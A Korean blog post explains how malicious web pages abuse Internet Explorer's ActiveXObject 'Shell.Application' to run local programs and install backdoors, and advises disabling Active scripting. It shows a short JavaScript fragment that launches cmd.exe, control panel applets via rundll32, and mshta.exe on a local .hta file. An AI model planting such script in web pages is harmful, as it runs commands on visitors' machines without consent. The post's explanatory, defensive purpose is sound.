달력

52024  이전 다음

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
반응형

 

 

이 해킹기법은 순수한 연구목적으로 공개하며, 악의적인 사용을 방지하기 위해 코드는 최소한으로만 공개합니다.
최근에 해킹 기법중에서 MS IE를 이용해서 백도어를 설치하는 해킹이 많습니다. 그중에서 가장 많이 사용되는 방법이 ActiveXObject 중에서 "Shell.Application" 메소드를 사용하는 방법이 있습니다. 특히 중국 해커 애들이 이런 것을 애용하는 경우가 많습니다. 이 메소드는 인터넷 영역에서 인트라넷 영역 즉 하드디스크로 쓰기가 가능하기 때문에 백도어 설치에 아주 좋은 취약점이 됩니다.
따라서 절대로 의심이 가능 웹 사이트는 방문하지 마시고 부득이 웹사이트를 방문할 때는 IE의 보안 탭에서 Active 스크립트를 비활성 시키시면 악의적인 실행을 막을 수 있습니다. 
사용예)
function ShellExecuteExe()
 { 
                ShellApp = new ActiveXObject("Shell.Application");
 
 또는 아래와 같이 cmd를 실행시키는 방법을 쓰거나, 
               
                ShellApp.ShowBrowserBar("{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}", true);
                ShellApp.ShellExecute("cmd.exe");
 
제어판을 실행하도록 만들 수 있습니다.
                ShellApp.ShellExecute("rundll32.exe", "shell32.dll,Control_RunDLL sysdm.cpl,,1")
                ShellApp.ShellExecute("rundll32.exe", "shell32.dll,Control_RunDLL netcpl.cpl,,1");
  }
               ShellApp.ShellExecute("c://windows//system32//mshta.exe","C://xx.hta")
반응형
Posted by 친절한 웬디양~ㅎㅎ
|